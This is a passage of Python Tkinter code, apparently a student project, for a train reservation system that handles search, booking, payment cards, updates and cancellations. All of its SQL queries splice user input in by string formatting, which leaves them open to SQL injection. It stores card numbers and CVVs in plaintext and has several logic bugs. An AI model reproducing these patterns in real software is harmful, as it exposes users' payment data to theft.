depDate.grid(row = 2, column = 0, sticky = E)\n self.date = StringVar()\n\n self.startDateEntry = Entry(frame2, textvariable = self.date, width = 10)\n self.startDateEntry.grid(row = 2, column = 1, sticky = W)\n\n b=Button(frame3, text =\"Find Trains\", command = self.departureInfo)\n b.pack(side=RIGHT)\n\n def selected(self):\n if self.v.get() %2 == 0:\n self.value = (floor(self.v.get()/2)) -1\n else:\n self.value = (floor(self.v.get()/2))\n\n def departureInfo(self):\n start_date = datetime.datetime.strptime(self.startDateEntry.get(), '%Y-%m-%d')\n if start_date < datetime.datetime.now():\n messagebox.showerror(\"Error\", \"Invalid Date (Either in the past or start > end)\")\n else:\n self.findAvailWindow.withdraw()\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n\n frame = Frame(self.departureWin)\n frame.pack(side=TOP)\n\n chosenCity = self.city.get()[2: len(self.city.get())-3]\n chosenArrv = self.arrv.get()[2: len(self.arrv.get())-3]\n chosenDate = self.date.get()\n\n server = self.Connect()\n cursor = server.cursor()\n\n stop1 = \"CREATE VIEW Stop1 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenCity)\n stop2 = \"CREATE VIEW Stop2 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenArrv)\n stops = \"CREATE VIEW Stops (Train_Number) AS SELECT Train_Number FROM Stop2 NATURAL JOIN Stop1\"\n query = \"SELECT STOP.Train_Number, STOP.Departure_Time, STOP.Arrival_Time, STOP.Name, TRAIN_ROUTE.First_Class_Price, TRAIN_ROUTE.Second_Class_Price FROM STOP, TRAIN_ROUTE, Stops \\\n WHERE (STOP.Train_Number = Stops.Train_Number) AND (TRAIN_ROUTE.Train_Number = Stops.Train_Number) AND (STOP.Name = '%s' OR STOP.Name = '%s')\" % (chosenCity, chosenArrv)\n\n cursor.execute(query)\n results = cursor.fetchall()\n\n departTime = []\n arriveTime = []\n\n for row in results:\n if str(row[3]) == chosenCity:\n departTime.append((row[1], row[3], row[0], row[4], row[5]))\n if str(row[3]) == chosenArrv:\n arriveTime.append((row[2], row[3], row[0], row[4], row[5]))\n self.duration = []\n for pair1 in departTime:\n for pair2 in arriveTime:\n if pair1[1] == chosenCity and pair2[1] == chosenArrv and pair1[2] == pair2[2]:\n self.duration.append((pair1[2],pair1[0],pair2[0],pair2[0] - pair1[0],pair1[3],pair1[4], pair1[1], pair2[1]))\n # 0: Train_Number, 1: Departure_Time, 2: Arrival_Time, 3: Duration, 4: First_Class_Price, 5: Second_Class_Price, 6: chosenCity, 7: chosenArrv\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 0, column = 0)\n l2 = Label(frame,text = \"Time(self.Duration)\").grid(row = 0, column = 2)\n l3 = Label(frame,text = \"1st Class Price\").grid(row = 0, column = 4)\n l4 = Label(frame,text = \"2nd Class Price\").grid(row = 0, column = 6)\n\n a = 1\n b = 1\n c = 2\n self.v = IntVar()\n for result in self.duration:\n Label(frame, text = str(result[0]), anchor = \"w\").grid(row = a, column = 0, sticky = \"ew\")\n Label(frame, text = str(result[1]) + \"-\" + str(result[2]) + \"\\n\" + str(result[3]), anchor = \"w\").grid(row = a, column = 2, sticky = \"ew\")\n Radiobutton(frame, text = str(result[4]), variable = self.v, value = b, command = self.selected).grid(row = a, column = 4, sticky = \"ew\")\n Radiobutton(frame, text = str(result[5]), variable = self.v, value = c, command = self.selected).grid(row = a, column = 6, sticky = \"ew\")\n a += 1\n b += 2\n c += 2\n\n self.row = a\n self.value1 = b\n self.value2 = c\n\n b1=Button(frame, text =\"Back\", command = self.switchtoSearchTrain)\n b1.grid(row = a, column = 0)\n b2=Button(frame, text =\"Next\", command = self.passengerInfo)\n b2.grid(row = a, column = 1)\n\n def switchtoSearchTrain(self):\n self.departureWin.destroy()\n self.findAvailWindow.deiconify()\n\n def passengerInfo(self):\n self.departureWin.withdraw()\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n\n frame = Frame(self.passengerInfoWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.passengerInfoWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.passengerInfoWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.passengerInfoWin)\n frame4.pack(side=TOP)\n\n baggage= Label(frame,text = \"Number of Baggage\")\n baggage.pack(side=LEFT)\n self.bags = IntVar()\n choices = [\"1\", \"2\", \"3\", \"4\"]\n option=OptionMenu(frame, self.bags, choices[0], *choices)\n option.pack(side=RIGHT)\n disclamer = Label(frame2,text = \"Every passenger can bring upto 4 baggage. 2 free of charge, 2 for $30 per bag\")\n disclamer.pack()\n\n passName= Label(frame3,text =\"Passenger Name\")\n passName.pack(side=LEFT)\n self.name2 = StringVar()\n nameEnt = Entry(frame3, textvariable = self.name2, width = 10)\n nameEnt.pack(side = RIGHT)\n\n if self.v.get() % 2 == 0:\n self.classChosen = 2\n else:\n self.classChosen = 1\n\n b1=Button(frame4, text =\"Back\", command = self.switchToDepartureInfo)\n b1.pack(side=LEFT)\n b2=Button(frame4, text =\"Next\", command=self.updateTrainList)\n b2.pack(side=RIGHT)\n\n def switchToDepartureInfo(self):\n self.passengerInfoWin.destroy()\n self.departureWin.deiconify()\n\n def updateTrainList(self):\n price = 0\n if self.bags.get() < 3:\n bagPrice = 0\n else:\n extraBags = self.bags.get() - 2\n bagPrice = extraBags * 30\n if self.v.get()%2 == 0: #(if even 2nd class)\n self.chosenClass = 2\n price = self.duration[self.value][5]\n else:\n self.chosenClass = 1\n price = self.duration[self.value][4]\n\n self.price = StringVar()\n self.price = price + bagPrice\n self.trainChosen = self.duration[self.value][0]\n self.results1.append((self.trainChosen, self.duration[self.value][1], self.duration[self.value][2], self.duration[self.value][3],\n self.duration[self.value][6],self.duration[self.value][7],\n self.chosenClass, self.price, self.bags.get(), self.name2.get()))\n self.makeReservation()\n\n def makeReservation(self):\n self.passengerInfoWin.withdraw()\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n\n frame = Frame(self.reservationWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.reservationWin)\n frame2.pack(side=TOP)\n\n selected = Label(frame,text = \"Currently Selected\")\n selected.grid(row = 0, column = 0)\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 0)\n l2 = Label(frame,text = \"Time(Duration)\").grid(row = 1, column = 1)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 2)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 3)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 4)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =5)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 6)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 7)\n l9 = Label(frame,text = \"Remove\").grid(row = 1, column = 8)\n\n\n a = 2\n b = 1\n self.w = IntVar()\n\n for result in self.results1:\n lb1=Label(frame, text = str(result[0]), anchor = \"w\")\n lb1.grid(row = a, column = 0, sticky = \"ew\")\n lb2=Label(frame, text = str(result[1]) + \"-\" + str(result[2]) +\"\\n\" + str(result[3]), anchor = \"w\")\n lb2.grid(row = a, column = 1, sticky = \"ew\")\n lb3=Label(frame, text = str(result[4]), anchor = \"w\")\n lb3.grid(row = a, column = 2, sticky = \"ew\")\n lb4=Label(frame, text = str(result[5]), anchor = \"w\")\n lb4.grid(row = a, column = 3, sticky = \"ew\")\n lb5=Label(frame, text = str(result[6]), anchor = \"w\")\n lb5.grid(row = a, column = 4, sticky = \"ew\")\n lb6=Label(frame, text = str(result[7]), anchor = \"w\")\n lb6.grid(row = a, column = 5, sticky = \"ew\")\n lb7=Label(frame, text = str(result[8]), anchor = \"w\")\n lb7.grid(row = a, column = 6, sticky = \"ew\")\n lb8 = Label(frame, text = str(result[9]), anchor = \"w\")\n lb8.grid(row = a, column = 7, sticky = \"ew\")\n r1 = Radiobutton(frame, text = \"Remove\", variable = self.w, value = b, command = self.select2)\n r1.grid(row = a, column = 8,sticky = \"ew\")\n a = a + 1\n b += 9\n\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Student_Discount FROM SYSTEM_INFO\"\n cursor.execute(query)\n res = cursor.fetchall()\n discount = res[0][0]\n\n query = \"SELECT Is_student FROM CUSTOMER WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n result3 = cursor.fetchone()\n temp_price = 0\n for entry in self.results1:\n temp_price += entry[7]\n self.price = temp_price\n print(result3[0])\n if result3[0] == 1:\n self.price = self.price*(1-discount/100)\n\n\n stuDis= Label(frame2,text = \"Student Discount Applied.\")\n stuDis.grid(row = 0, column = 0)\n totalC= Label(frame2, text = \"Total Cost\")\n totalC.grid(row = 1, column = 0)\n #cost = StringVar()\n costEnt = Label(frame2, text = self.price, width = 10)\n costEnt.grid(row = 1, column = 1)\n\n useCard= Label(frame2, text = \"Use Card\")\n useCard.grid(row = 4, column = 0)\n\n query = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n results = cursor.fetchall()\n newRes = []\n for res in results:\n newRes.append(int(res[0]))\n\n self.card = IntVar()\n option=OptionMenu(frame2, self.card, newRes[0], *newRes)\n option.grid(row = 4, column = 1)\n\n b5=Button(frame2, text =\"Delete Card\", command = self.deleteCard)\n b5.grid(row = 4, column =2)\n b1=Button(frame2, text =\"Add Card\", command = self.addCard)\n b1.grid(row = 4, column =3)\n\n b2=Button(frame2, text =\"Continue adding a train\", command = self.switchToSearch)\n b2.grid(row = 5, column = 0)\n\n b3=Button(frame2, text =\"Back\", command = self.switchToPassengerInfo)\n b3.grid(row = 6, column = 0)\n b4=Button(frame2, text =\"Submit\", command = self.confirmation)\n b4.grid(row =6, column = 1)\n\n def switchToSearch(self):\n self.reservationWin.destroy()\n self.searchTrain()\n\n def switchToPassengerInfo(self):\n self.reservationWin. destroy()\n self.passengerInfoWin.deiconify()\n\n## def getCost(self):\n## total = 0\n## for button in self.checkButtonsInDetails:\n## if button.is_checked():\n## total += button.selectRoom()[5]\n## total += button.selectRoom()[2]\n## self.totalCost = total*self.numDays\n## totallabel5 = Label(self.checkDetailsFrame, text=str(self.totalCost))\n## self.totalCostVarLabel.pack(side=TOP)\n## totallabel5.pack(side=TOP)\n\n def addCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n\n frame = Frame(self.paymentIWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.paymentIWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.paymentIWin)\n frame4.pack(side=TOP)\n frame5 = Frame(self.paymentIWin)\n frame5.pack(side=TOP)\n\n l1= Label(frame,text = \"Name on Card\")\n l1.pack(side=LEFT)\n l2= Label(frame2,text = \"Card Number\")\n l2.pack(side=LEFT)\n l3= Label(frame3,text = \"CVV\")\n l3.pack(side=LEFT)\n l4= Label(frame4,text = \"Expiration Date\")\n l4.pack(side=LEFT)\n\n self.name = StringVar()\n cardName = Entry(frame, textvariable = self.name, width = 10)\n cardName.pack(side = RIGHT)\n\n self.num = StringVar()\n cardNum = Entry(frame2, textvariable = self.num, width = 10)\n cardNum.pack(side = RIGHT)\n\n self.CVVnum = StringVar()\n Cvv = Entry(frame3, textvariable = self.CVVnum, width = 10)\n Cvv.pack(side = RIGHT)\n\n self.date1 = StringVar()\n expdate = Entry(frame4, textvariable = self.date1, width = 10)\n expdate.pack(side = RIGHT)\n\n b4=Button(frame5, text =\"Submit\", command = self.addCardCheck)\n b4.pack(side=LEFT)\n\n def addCardCheck(self):\n self.expDate = datetime.datetime.strptime(self.date1.get(), '%Y-%m-%d')\n if self.expDate <= datetime.datetime.now():\n messagebox.showerror(\"Error, your card is expired.\")\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM PAYMENT_INFO \\\n WHERE Card_Number = '%s'\" % (self.num.get())\n cursor.execute(query)\n results = cursor.fetchall()\n if len(results) != 0:\n messagebox.showerror(\"Error\", \"Card number already in use\")\n return\n elif self.expDate == \"\" or self.name.get() == \"\" or self.num.get() == \"\" or self.CVVnum.get() == \"\":\n messagebox.showerror(\"Error\", \"Expiration Date, Name, Number, and CVV must be filled\")\n return\n elif len(self.num.get()) != 10:\n messagebox.showerror(\"Error\", \"Card Number must be 10 digits\")\n return\n elif len(self.CVVnum.get()) != 3:\n messagebox.showerror(\"Error\", \"CVV must be 3 digits\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"INSERT INTO PAYMENT_INFO(Card_Number, CVV, Exp_Date, Name_on_card, Username) VALUES ('%s', '%s', '%s', '%s', '%s')\" % (self.num.get(), self.CVVnum.get(), self.expDate, self.name.get(), self.username.get())\n cursor.execute(query)\n result = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin.destroy()\n self.makeReservation()\n\n def deleteCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin2= Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n\n frame = Frame(self.paymentIWin2)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin2)\n frame2.pack(side=BOTTOM)\n cardNum = Label(frame, text = \"Card Number\")\n cardNum.pack(side=LEFT)\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query1)\n results = cursor.fetchall()\n\n self.cardNum = StringVar()\n self.cardNum.set(results[0][0])\n\n option=OptionMenu(frame, self.cardNum, results[0], * results)\n option.pack(side=RIGHT)\n\n b1=Button(frame2, text =\"Submit\", command = self.deleteCardCheck)\n b1.pack(side=BOTTOM)\n\n self.cardNum = int(self.cardNum.get()[1:11])\n\n def deleteCardCheck(self):\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Is_cancelled, Departure_Date FROM RESERVATION NATURAL JOIN RESERVES WHERE Card_Number ='%s'\" % (self.cardNum)\n cursor.execute(query1)\n results = cursor.fetchall()\n for row in results:\n self.departDate = row[1]\n if self.departDate >= datetime.datetime.today() and row[0] == 0:\n messagebox.showerror(\"Error\", \"Card is being used for existing reservation\")\n return\n\n query2 = \"DELETE FROM PAYMENT_INFO WHERE Card_Number = '%s'\" % (self.cardNum)\n cursor.execute(query2)\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin2.destroy()\n self.makeReservation()\n\n def switchToConfirm1(self):\n self.paymentIWin.withdraw()\n self.confirmation()\n\n def switchToConfirm2(self):\n self.paymentIWin2.withdraw()\n self.confirmation()\n\n def backToMain(self):\n self.confirm.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def select2(self):\n self.index = floor(self.w.get()/9)\n self.results1.remove(self.results1[self.index])\n self.reservationWin.destroy()\n self.makeReservation()\n\n def confirmation(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT MAX(ReservationID) FROM RESERVATION\"\n cursor.execute(query)\n maxID = cursor.fetchall()\n self.newReservationID = maxID[0][0] + 1;\n\n query1 = \"INSERT INTO RESERVATION(ReservationID, Is_cancelled, Username, Card_Number) VALUES ('%d', 0, '%s', '%d')\" % (self.newReservationID, self.username.get(),self.card.get())\n cursor.execute(query1)\n\n for res in self.results1:\n query2 = \"INSERT INTO RESERVES(ReservationID, Train_Number, Class, Departure_Date, Passenger_Name, Number_of_Bags, Departs_From, Arrives_At, Total_Cost) \\\n VALUES ('%d', '%d', '%d', '%s', '%s', '%d', '%s', '%s', '%f')\" % (self.newReservationID, self.trainChosen, self.classChosen, self.date.get(), res[9], res[6], res[4], res[5], res[7])\n cursor.execute(query2)\n\n self.reservationWin.destroy()\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n\n frame = Frame(self.confirm)\n frame.pack()\n\n label1 = Label(frame, text = \"Reservation ID:\")\n label1.grid(row = 0, column = 0,sticky=E)\n e1 = Label(frame, text = self.newReservationID, width = 10)\n e1.grid(row = 0, column = 1)\n label3 = Label(frame, text=\"Thank you so much for your purchase! Please save the reservation ID for your records.\")\n label3.grid(row = 2, column = 0, columnspan = 2)\n\n query = \"SELECT ReservationID FROM RESERVATION WHERE Card_Number = '%d'\" % (self.card.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n\n self.entries = []\n self.results1 = []\n\n b=Button(frame, text =\"Go back to choose functionality\", command=self.backToMain)\n b.grid(row=3,column=1,sticky=E)\n\n def updateReservation(self):\n self.primaryWindow.destroy()\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n frame = Frame(self.updateWin)\n frame.pack()\n self.resID = IntVar()\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n e1 = Entry(frame, textvariable = self.resID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.updateReservation2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchMainMenu)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchMainMenu(self):\n self.updateWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def update1(self):\n self.index = floor(self.w.get()/9)\n#####################table info, new dept date, change fee, updated cost,#################\n def updateReservation2(self):\n self.updateWin.withdraw()\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin2)\n frame.pack()\n frame2 = Frame(self.updateWin2)\n frame2.pack()\n\n l0 = Label(frame,text = \"Select\").grid(row = 1, column = 0)\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 1)\n l2 = Label(frame,text = \"Date\").grid(row = 1, column = 2)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 3)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 4)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 5)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =6)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 7)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 8)\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n\n a = 2\n b = 1\n self.w = IntVar()\n print(self.results)\n for result in self.results:\n Radiobutton(frame, variable = self.w, value = b, command = self.update1).grid(row = a, column = 0)\n Label(frame, text = str(result[1]), anchor = \"w\").grid(row = a, column = 1, sticky = \"ew\")\n\n l11 = Label(frame, text = str(result[3]), anchor = \"w\")\n l11.grid(row = a, column = 2, sticky = \"ew\")\n l12 = Label(frame, text = str(result[6]), anchor = \"w\")\n l12.grid(row = a, column = 3, sticky = \"ew\")\n l13 = Label(frame, text = str(result[7]), anchor = \"w\")\n l13.grid(row = a, column = 4, sticky = \"ew\")\n l14 = Label(frame, text = str(result[2]), anchor = \"w\")\n l14.grid(row = a, column = 5, sticky = \"ew\")\n l15 =Label(frame, text = str(result[8]), anchor = \"w\")\n l15.grid(row = a, column = 6, sticky = \"ew\")\n l16 = Label(frame, text = str(result[5]), anchor = \"w\")\n l16.grid(row = a, column = 7, sticky = \"ew\")\n l17 = Label(frame, text = str(result[4]), anchor = \"w\")\n l17.grid(row = a, column = 8, sticky = \"ew\")\n a = a + 1\n b += 9\n\n b1 = Button(frame2, text = \"Back\", command = self.switchUpdateReservation)\n b1.pack(side = LEFT)\n b2 = Button(frame2, text = \"Next\", command = self.updateReservation3)\n b2.pack(side = RIGHT)\n\n def switchUpdateReservation(self):\n self.updateWin2.destroy()\n #self.updateWin = Toplevel()\n self.updateReservation()\n\n def switchUpdateReservation2(self):\n self.updateWin3.destroy()\n self.updateReservation2()\n\n def updateTree2(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 2, column = 0)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"date\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"date\", text = \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateTree3(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 4, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateDepartureDate(self):\n self.updatedDate = datetime.datetime.strptime(self.date.get(), '%Y-%m-%d')\n\n\n def updateReservation3(self):\n self.updateWin2.withdraw()\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin3)\n frame.pack()\n frame2 = Frame(self.updateWin3)\n frame2.pack()\n frame3 = Frame(self.updateWin3)\n frame3.pack()\n frame4 = Frame(self.updateWin3)\n frame4.pack()\n frame5 = Frame(self.updateWin3)\n frame5.pack()\n\n updateIndex = floor(self.w.get()/9)\n updateTuple = self.results[updateIndex]\n\n l1 = Label(frame, text = \"Current Train Ticket\")\n l1.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree = self.updateTree2(frame2)\n tree.insert('', i, text='', values=(updateTuple[1], updateTuple[3],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n newdepDate= Label(frame3,text =\"New Departure Date\")\n newdepDate.grid(row = 0, column = 0, sticky = E)\n self.date = StringVar() ## assume YYYY-MM-DD\n e1= Entry(frame3,textvariable = self.date, width = 10)\n e1.grid(row = 0, column = 1, sticky = EW)\n self.updatedDate = updateTuple[3]\n b1 = Button(frame3, text = \"Search availability\", command = self.updateDepartureDate)\n b1.grid(row = 0, column = 2, sticky = EW)\n\n\n l2 = Label(frame3, text = \"Updated Train Ticket\")\n l2.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree2 = self.updateTree3(frame4)\n tree2.insert('', i, text='', values=(updateTuple[1],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n\n\n\n server = self.Connect()\n cursor = server.cursor()\n query2 = \"SELECT Change_fee FROM SYSTEM_INFO\"\n cursor.execute(query2)\n changefee = cursor.fetchone()\n change_fee = changefee[0]\n query4 = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query4)\n self.results = cursor.fetchall()\n query3 = \"SELECT Total_Cost FROM RESERVES WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.resID.get(), self.results[self.index][1])\n cursor.execute(query3)\n totalcost = cursor.fetchone()\n self.total_cost = totalcost[0]\n self.total_cost = self.total_cost + change_fee\n print (type(self.total_cost))\n\n changeFee = Label(frame5,text =\"Change Fee\")\n changeFee.grid(row = 0, column = 0, sticky = E)\n self.value = StringVar()\n e2 = Label(frame5,text = change_fee, width = 10)\n e2.grid(row = 0, column = 1, sticky = E)\n updatedCost = Label(frame5,text =\"Updated Total Cost\")\n updatedCost.grid(row = 1, column = 0, sticky = E)\n e3 = Label(frame5, text = self.total_cost, width = 10)\n e3.grid(row = 1, column = 1)\n\n\n b2=Button(frame5, text =\"Back\", command = self.switchUpdateReservation2)\n b2.grid(row =2, column = 0, sticky = E)\n b3=Button(frame5, text =\"Submit\", command = self.submit)\n b3.grid(row =2, column = 1, sticky = E)\n\n\n def submit(self):\n self.updateWin3.destroy()\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"UPDATE RESERVES SET RESERVES.Departure_Date = '%s', RESERVES.Total_Cost = '%d' WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.updatedDate, self.total_cost, self.resID.get(), self.results[self.index][1])\n cursor.execute(query1)\n cursor.close()\n server.commit()\n server.close()\n self.mainMenu()\n\n def cancelRes(self):\n self.primaryWindow.withdraw()\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n self.cancelID = IntVar()\n e1 = Entry(frame, text = self.cancelID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.cancelRes2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchToMain)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchToMain(self):\n self.cancelWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def updateTree4(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 0, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"Date\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"Date\", text= \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def cancelRes2(self):\n self.cancelWin.destroy()\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin2)\n frame.pack()\n frame2 = Frame(self.cancelWin2)\n frame2.pack()\n frame3 = Frame(self.cancelWin2)\n frame3.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.cancelID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n if len(self.results) == 0:\n messagebox.showerror(\"Error\", \"Reservation already cancelled, cannot cancel again\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n\n i = 0\n self.delPrice = 0\n tree = self.updateTree4(frame)\n dates = []\n for res in self.results:\n tree.insert('', i, text='', values=(res[1], res[3], res[6],res[7], res[2], res[8], res[5],res[4]))\n self.delPrice += res[8]\n dates.append(res[3])\n i += 1\n self.departDate = min(dates)\n\n l1= Label(frame2,text =\"Total Cost of Reservation\")\n l1.grid(row = 1, column = 0, sticky = E)\n\n e1= Label(frame2,text = self.delPrice, width = 10)\n e1.grid(row = 1, column = 1, sticky = EW)\n\n #self.cancelDate = datetime.today()\n self.cancelDate = datetime.date.today()\n l2 = Label(frame2, text = \"Date of Cancellation\")\n l2.grid(row = 2, column = 0, sticky = E)\n e2= Label(frame2,text = self.cancelDate, width = 10)\n e2.grid(row = 2, column = 1, sticky = EW)\n\n if self.cancelDate < (self.departDate - datetime.timedelta(7)):\n self.refund = float(self.delPrice) * 0.8 - 50.0\n elif self.cancelDate < (self.departDate - datetime.timedelta(1)) and (self.cancelDate > (self.departDate - datetime.timedelta(7))):\n self.refund = float(self.delPrice) * 0.5 - 50\n elif self.cancelDate > (self.departDate - datetime.timedelta(1)):\n self.refund = 0\n messagebox.showerror(\"Error\", \"Cannot cancel reservation within a day of departure date\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n elif self.refund < 0:\n self.refund = 0\n\n l3 = Label(frame2, text = \"Amount to be Refunded\")\n l3.grid(row = 3, column = 0, sticky = E)\n e2= Label(frame2,text = self.refund, width = 10)\n e2.grid(row = 3, column = 1, sticky = EW)\n\n b2=Button(frame3, text =\"Back\", command = self.switchCancelRes1)\n b2.grid(row =4, column = 0, sticky = E)\n\n b3=Button(frame3, text =\"Submit\", command = self.switchTC)\n b3.grid(row =4, column = 1, sticky = E)\n\n def switchCancelRes1(self):\n self.cancelWin2.destroy()\n self.cancelRes()\n\n def switchTC(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Is_cancelled, MIN(Departure_Date) FROM RESERVATION, RESERVES WHERE RESERVES.ReservationID = '%d' AND RESERVATION.ReservationID = '%d'\" % (self.cancelID.get(), self.cancelID.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n queryCancel = \"UPDATE RESERVATION SET Is_cancelled = 1 WHERE ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(queryCancel)\n query = \"DELETE FROM RESERVES WHERE RESERVES.ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(query)\n\n cursor.close()\n server.commit()\n server.close()\n self.cancelWin2.destroy()\n self.primaryWindow.destroy()\n self.primaryWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewReview(self):\n self.primaryWindow.withdraw()\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.TrainReviewNumber, width = 20)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Back\", command = self.backMain)\n b1.grid(row = 1, column = 0)\n b2 = Button(frame, text = \"Next\", command = 